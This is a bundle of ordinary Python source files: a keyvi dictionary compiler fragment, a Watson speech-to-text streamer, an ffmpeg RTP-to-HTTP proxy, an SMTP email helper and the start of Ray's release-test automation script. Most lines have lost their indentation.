input_fd = open(input_file)
for line in input_fd:
try:
parts = line.split("\t")
key = parts[0]
                if key != remove_control_chars(key):
                    print "skip key: " + ":".join("{:02x}".format(ord(c)) for c in key) + " due to containing control characters"
                    skipped_keys += 1
                    continue
                value = parts[1]
shard = keyvi.JumpConsistentHashString(key, shards)
compilers[shard].Add(key, value)
            except Exception:
                print "failed to add: " + line
print "Skipped keys " + str(skipped_keys)
for i in range(jobs):
t = threading.Thread(target=compile_worker)
t.daemon = True
t.start()
    if shards == 1:
        # single shard: only compilers[0] exists
        compile_queue.put((compilers[0], output))
    else:
        for i in range(shards):
            compile_queue.put((compilers[i], output + "-" + str(i)))
compile_queue.join()
ARGV = [
('-i', '--input', str, None, 'input file'),
('-o', '--output', str, None, 'output'),
('-b', '--bucket', str, None, 's3 bucket to read from'),
('-k', '--s3key', str, None, 's3 key/folder to read from'),
('-j', '--jobs', int, 1, 'number of parallel jobs'),
('-s', '--shards', int, 1, 'number of shards'),
]
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Compile json keyvi dictionaries')
for arg in ARGV:
parser.add_argument(*arg[0:2], type=arg[2], default=arg[3], help=arg[4])
args = parser.parse_args()
if args.input:
compile_file(args.input, args.output, args.jobs, args.shards)
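# Example invocation (hypothetical file names): compile a gzipped TSV of
# "key<TAB>json" lines into 4 keyvi shards using 4 compile threads:
#   python compile_json.py -i dict.tsv.gz -o dict.kv -j 4 -s 4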
|
ibmstt2.py | import re
import logging, traceback
from websocket import create_connection
from watson_developer_cloud import AuthorizationV1, SpeechToTextV1
import json
import threading
import sys, os
import time
from configparser import SafeConfigParser
######
try:
parser = SafeConfigParser()
parser.read(sys.argv[1] + "/../settings.conf")
USERNAME = parser.get('STT_settings', 'username')
PASSWORD = parser.get('STT_settings', 'password')
except Exception as e:
logging.error(str(e))
logging.warning("Could not load IBM STT configuration settings. Cannot connect websocket. Disconnecting...")
sys.exit()
logging.basicConfig(
filename="stt_debug.log",
level=1,
format="*****\n%(asctime)s||%(levelname)s||line %(lineno)d||%(funcName)s: %(message)s",
datefmt='%m/%d/%Y %I:%M:%S %p'
)
logging.info("---------NEW DEBUG SESSION---------")
def logExecutionInfo():
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
logging.error(''.join('!! ' + line for line in lines))
import pyaudio
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
CHUNK = 1024
CHUNKSIZE = 4000
RECORD_SECONDS = 6000
WAVE_OUTPUT_FILENAME = "speech.wav"
TIMEOUT_LIMIT = 3
TIME_SINCE_RESPONSE = 0
TIME_AT_RESPONSE = time.time() + 8
ws = None
token = None
t3 = None
isRestarting = False
def resetConnection():
global ws
global token
global t3
global isRestarting
logging.info("Restarting WS...")
try:
ws.close()
except Exception as e:
logging.error("Could not close WebSocket: " + str(e))
ws = None
logging.info("\tClosed previous websocket...")
try:
ws = create_connection('wss://stream.watsonplatform.net/speech-to-text/api/v1/recognize?watson-token=' +
token + '&model=en-US_BroadbandModel')
except Exception as e:
logging.error("Creating WS failed, error: " + str(e))
logExecutionInfo()
return
logging.info("\tEstablished WS connection...")
ws.send('{"action":"start","content-type":"audio/l16;rate=16000","interim_results":true,"inactivity_timeout":600}')
logging.info("\tSent initiation request to IBM")
logging.info("Websocket recreated, starting Mic stream again...")
isRestarting = False
#getMicData(ws)
def getMicData():
global totalData
global isRestarting
global ws
audio = pyaudio.PyAudio()
# start Recording
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True, #input_device_index=inputDeviceIndex,
frames_per_buffer=CHUNK)
logging.info("Mic stream initiated, recording...")
frames = []
totalData = b''
bytesSent = 0
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
try:
logging.info("Reading stream chunk " + str(i))
data = stream.read(CHUNK, False)
        except Exception as e:
            logging.error("Stream reading failed, error: " + str(e))
            continue  # skip this chunk; "data" would be stale or undefined
try:
logging.info("Appending stream data for chunk " + str(i) + "...")
totalData += data
except Exception as e:
logging.error("Appending stream data to websocket buffer failed: " + str(e))
totalData = b''
if len(totalData) > CHUNKSIZE:
try:
dataChunk = totalData[0:CHUNKSIZE]
dataStr = str(dataChunk)
#matched = re.search(r'&\w+;', dataStr)
#try:
# dataStr = dataStr.encode('utf-8')
logging.info("Sending data chunk " + str(i))
ws.send(dataChunk, opcode=0x2)
#except Exception as e:
# logging.error("Invalid binary message detected. Dumping message. Error type " + type(e).__name__ + ": " + str(e))
# totalData = totalData[CHUNKSIZE:]
except (OSError) as e:
logging.error("Invalid binary message detected. Dumping message. Error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
totalData = totalData[CHUNKSIZE:]
resetConnection()
except Exception as e:
logging.error("Sending failed, error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
totalData = totalData[CHUNKSIZE:]
resetConnection()
try:
logging.info("Stripping used data chunk " + str(i) + " from websocket buffer...")
totalData = totalData[CHUNKSIZE:]
except Exception as e:
logging.error("Stripping CHUNKSIZE from websocket buffer failed: " + str(e))
#ws.send(data, opcode=0x2)
#bytesSent = i * CHUNKSIZE
#print(str(bytesSent/1000/1000) + " megabytes")
logging.info("Mic stream has finished recording, closing stream, terminating audio...")
# stop Recording
stream.stop_stream()
stream.close()
audio.terminate()
######
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
def receiveAudio():
global isRestarting
global ws
global TIME_SINCE_RESPONSE
global TIME_AT_RESPONSE
while True:
try:
if(check_pid(int(sys.argv[2])) is False):
logging.warning("PitchPal termination detected, closing stream and websocket...")
ws.close()
os.kill(os.getpid(), 9)
except Exception as e:
logging.error("Monitor failed, error type " + type(e).__name__ + ": " + str(e))
logExecutionInfo()
        try:
            result = json.loads(ws.recv())
        except Exception as e:
            #logging.error("Receiving failed, error type " + type(e).__name__ + ": " + str(e))
            #logExecutionInfo()
            # skip this iteration; otherwise "result" would be stale or undefined
            continue
print("----------")
if("results" in result):
print(result["results"][0]["alternatives"][0]["transcript"])
try:
overlayF = open(sys.argv[1]+"/overlay.txt", "w")
overlayF.write(result["results"][0]["alternatives"][0]["transcript"])
except Exception as e:
logging.error("Error writing to overlay buffer: " + str(e))
#TIME_AT_RESPONSE = time.time()
#logging.info("Time since last websocket response: " + str(time.time()-TIME_AT_RESPONSE))
def checkForTimeout():
global TIME_SINCE_RESPONSE
global TIME_AT_RESPONSE
while True:
TIME_SINCE_RESPONSE = time.time() - TIME_AT_RESPONSE
if(TIME_SINCE_RESPONSE > TIMEOUT_LIMIT):
logging.info("Timeout limit reached, restarting WS...")
try:
resetConnection()
except Exception as e:
logging.error("Could not reset connection: " + str(e))
TIME_AT_RESPONSE = time.time()
authorization = AuthorizationV1(
username=USERNAME,
password=PASSWORD)
token = authorization.get_token(url=SpeechToTextV1.default_url)
ws = create_connection('wss://stream.watsonplatform.net/speech-to-text/api/v1/recognize?watson-token=' +
token + '&model=en-US_BroadbandModel')
ws.send('{"action":"start","content-type":"audio/l16;rate=16000","interim_results":true,"inactivity_timeout":600}')
t3 = threading.Thread(target=receiveAudio)
t3.start()
#t4 = threading.Thread(target=checkForTimeout)
#t4.start()
getMicData()
t3.join()
#t4.join()
ws.close()
|
main.py | # -*- coding: utf-8 -*-
import os, sys, subprocess, threading, time, random
import socketserver, http.server
from queue import Queue, Empty
import urllib
class FFMpeg:
def __init__(self, addr):
self.addr = addr
self.fragSize = 8192
self.opts = None
self.buffer = Queue()
self.__STOPNOW__ = False
    def __del__(self):
        if(self.status() == 'running'):
            self.stop()
def start(self):
self.opts = ['ffmpeg.exe', '-i', self.addr, '-acodec', 'copy', '-vcodec', 'copy', '-frag_size', str(self.fragSize), '-f', 'mpegts', '-']
nullDev = open(os.devnull, 'wb')
self.ffmpeg = subprocess.Popen(self.opts, stdout=subprocess.PIPE, stderr=nullDev)
self.ffmpegThread = threading.Thread(target = self.fillBuffer, args=[])
self.ffmpegThread.start()
def stop(self, stopFlag = True):
if(self.opts is None):
raise RuntimeError('Already stopped.')
if(not self.__STOPNOW__):
self.__STOPNOW__ = stopFlag
while(self.__STOPNOW__):
pass
if(self.ffmpeg.poll() is None):
self.ffmpeg.kill()
self.ffmpegThread = None
self.ffmpeg = None
self.opts = None
self.buffer = Queue()
def status(self):
if(self.opts is None):
return 'stopped'
else:
return 'running'
def fillBuffer(self):
while(self.__STOPNOW__ == False and self.ffmpeg.poll() is None):
data = self.ffmpeg.stdout.read(self.fragSize)
self.buffer.put(data)
self.stop(stopFlag = False)
self.__STOPNOW__ = False
def getData(self):
return self.buffer.get(True, 10)
class Proxy(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
path = self.path.split('/')
path.remove('')
        if(len(path) < 2):
            self.send_response(404)
            self.end_headers()
        elif(len(path) == 2):
if(path[0] == 'rtp'):
addr = 'rtp://%s' % (path[1])
else:
self.send_response(404)
self.end_headers()
return
self.send_response(200)
self.end_headers()
ffmpeg = FFMpeg(addr)
ffmpeg.start()
while((not self.server.stop) and ffmpeg.status() == 'running'):
try:
data = ffmpeg.getData()
except Empty:
break
try:
self.wfile.write(data)
except ConnectionResetError:
break
except ConnectionAbortedError:
break
if(ffmpeg.status() == 'running'):
ffmpeg.stop()
print("Connection Reset.", file=sys.stderr)
class Server:
def __init__(self, port):
self.port = port
self.httpd = None
def start(self):
self.httpd = socketserver.ThreadingTCPServer(('192.168.1.4', self.port), Proxy)
self.httpd.stop = False
threading.Thread(target=self.httpd.serve_forever).start()
print("HTTP server started at port {0}".format(self.port))
def stop(self):
if self.httpd:
self.httpd.stop = True
self.httpd.shutdown()
print("HTTP server stopped")
if __name__ == '__main__':
s = Server(8090)
s.start()
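    # Hypothetical usage: with ffmpeg.exe on PATH and a multicast source at
    # rtp://239.0.0.1:5000, opening http://192.168.1.4:8090/rtp/239.0.0.1:5000
    # in a media player streams the remuxed MPEG-TS output.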
|
notifications.py | """
Standalone module for sending emails.
No dependencies outside of the Python standard library.
Author: Valtteri Rajalainen
"""
import smtplib
import ssl
import base64
import sys
import typing
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from threading import Thread
# for testing
mutex = None
def _load_credentials(filepath: str) -> typing.Tuple[str, str]:
"""
Open the provided filepath and read the credentials from it.
Expected format is: "EMAIL\nPASSWORD"
"""
with open(filepath) as file:
email = file.readline().strip()
password = file.readline().strip()
return email, password
def _write_email_to_stream(content: str, stream: typing.TextIO):
"""
Write email to the provided TextIO stream. The stream is not closed.
Content is expected to be valid email format: headers + '\n\n' + base64 encoded content.
"""
meta, content = content.split('\n\n')
stream.write(meta)
stream.write('\n\n')
stream.write(base64.b64decode(content).decode('utf-8'))
stream.write('\n')
stream.flush()
def send_email(message: dict, receiver: str, host: tuple, credentials_path: str, use_ssl=True):
"""
    Send the email to the specified receiver using the host credentials for the smtp relay.
    Message must be a dictionary. It is expected to have two entries: 'content' and 'subject'.
    The 'content'-entry must be a tuple: (CONTENT_TEXT: str, CONTENT_TYPE: str)
    The 'subject'-entry is expected to be a simple string.
    Host must be a tuple: (IP_ADDR: str, PORT: int).
    If IP_ADDR is None, PORT is expected to be a file-like object,
    where the email is written instead of being sent through the network.
    The credentials path specifies the file where the email credentials can be read from.
    Expected format for the file is: 'EMAIL_ADDR\nPASSWORD'
    The actual sending of the email is done in a separate thread. If the mutex is not None,
    this separate thread acquires the lock while sending the email. This is useful in testing.
"""
addr, port = host
sender, password = _load_credentials(credentials_path)
content, content_type = message.get('content', ('', 'plain'))
mime_msg = MIMEText(content, content_type, _charset='utf-8')
mime_msg['Subject'] = message.get('subject', '')
mime_msg['From'] = sender
    mime_msg['To'] = receiver
reply_to = message.get('reply-to', sender)
mime_msg.add_header('Reply-To', reply_to)
if addr is None:
_write_email_to_stream(mime_msg.as_string(), port)
return
server: typing.Union[smtplib.SMTP, smtplib.SMTP_SSL]
if use_ssl:
context = ssl.create_default_context()
server = smtplib.SMTP_SSL(addr, port, context=context)
else:
server = smtplib.SMTP(addr, port)
def send():
if mutex is not None:
mutex.acquire()
try:
if use_ssl:
server.login(sender, password)
            server.sendmail(sender, receiver, mime_msg.as_string())
except smtplib.SMTPException as exc:
sys.stderr.write(str(exc))
finally:
if mutex is not None:
mutex.release()
server.quit()
Thread(target=send).start()
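# A minimal usage sketch (hypothetical addresses and credentials file):
#
#   message = {'subject': 'Build finished',
#              'content': ('All tests passed.', 'plain')}
#   send_email(message, 'dev@example.com', ('smtp.example.com', 465),
#              '/etc/mail_credentials')
#
# Passing host=(None, sys.stdout) writes the decoded email to stdout instead
# of sending it over the network, as described in the docstring.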
|
e2e.py | """
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in an S3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built once.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --no-report --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off by adding the --kick-off-only
parameter to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specifies the maximum time in seconds that can pass without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
"""Return environment variable with default value"""
# If the environment variable is set but "", still return default
return os.environ.get(key, None) or default
GLOBAL_CONFIG = {
"ANYSCALE_USER": getenv_default("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": getenv_default(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # cld_4F7k8814aZzGG8TNUGPKnc
"ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
"RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": getenv_default("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": getenv_default(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
REPORT_S = 30
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
pass
class ReleaseTestTimeoutError(RuntimeError):
pass
class SessionTimeoutError(ReleaseTestTimeoutError):
pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
pass
class CommandTimeoutError(ReleaseTestTimeoutError):
pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
f":results, :artifacts, :category)")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": now.strftime("%Y-%m-%d %H:%M:%S")
},
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "status",
"value": {
"stringValue": status
}
},
{
"name": "last_logs",
"value": {
"stringValue": logs
}
},
{
"name": "results",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(results)
},
},
{
"name": "artifacts",
"typeHint": "JSON",
"value": {
"stringValue": json.dumps(artifacts)
},
},
{
"name": "category",
"value": {
"stringValue": category
}
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def log_results_and_artifacts(result: Dict):
results = result.get("results", {})
if results:
msg = "Observed the following results:\n\n"
for key, val in results.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any results."
logger.info(msg)
artifacts = result.get("artifacts", {})
if artifacts:
msg = "Saved the following artifacts:\n\n"
for key, val in artifacts.items():
msg += f" {key} = {val}\n"
else:
msg = "Did not find any artifacts."
logger.info(msg)
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
if session_id:
# Just trigger a request. No need to wait until session shutdown.
sdk.terminate_session(
session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
session_name: str) -> Optional[str]:
session_id = None
logger.info(f"Looking for existing session with name {session_name}")
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(name=dict(equals=session_name)))
if len(result.results) > 0 and result.results[0].state == "Running":
logger.info("Found existing session.")
session_id = result.results[0].id
return session_id
def create_or_find_compute_template(
sdk: AnyscaleSDK,
project_id: str,
compute_tpl: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
                    logger.warning(
                        f"Got exception when trying to create compute "
                        f"template: {e}. Sleeping for 10 seconds and then "
                        f"retrying once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
                    logger.warning(
                        f"Got exception when trying to create app "
                        f"config: {e}. Sleeping for 10 seconds and then "
                        f"retrying once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
